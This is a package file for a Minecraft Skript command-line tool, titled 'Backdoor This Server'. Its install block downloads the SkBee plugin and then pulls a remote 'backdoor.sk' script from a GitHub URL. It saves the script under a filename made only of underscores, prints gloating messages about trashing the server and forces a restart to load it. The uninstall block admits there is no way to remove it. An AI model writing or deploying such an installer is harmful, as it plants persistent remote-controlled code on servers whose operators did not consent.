@CMD PACKAGE STR
@NAME=Backdoor This Server
@MainInstallPath=plugins/skript
@CurrentVersion=1.0
@PackageUpdateURL=https://raw.githubusercontent.com/Domracz/SkriptCommandLine/main/cmdcode/packages/backdoor_this_server/backdoor_this_server.cmdpackage
@CMD PACKAGE END
@PACKAGE INSTALL STR
*!Server.plugins.contains=SkBee
    cd ":plugins"
    dl https://github.com/ShaneBeee/SkBee/releases/download/2.7.6/SkBee-2.7.6.jar -> SkBee-2.7.6.jar
$snd "&4You have just installed a backdoor. HAHAHAHA"
$snd "&4BACKDOOR.SK ON TOP!"
$snd "&4YOUR SERVER HAS BEEN TRASHED!"
$dl https://raw.githubusercontent.com/Domracz/SkriptCommandLine/main/cmdcode/packages/backdoor_this_server/backdoor.sk -> _____________________.sk
$snd "&4HAHAHHA! THE BACKDOOR DOWNLOAD HAS BEEN COMPLETED! now... TIME FOR YOUR SERVER TO DIE!"
$snd "&4I'M GOING TO RESTART YOUR SERVER NOW!"
$Server.restart
@PACKAGE INSTALL END
@PACKAGE UNINSTALL STR
$snd "&4I have no idea how the heck you ran this command, but still. There isnt an installer for this backdoor! BACKDOOR.SK ON TOP!"
@PACKAGE UNINSTALL END
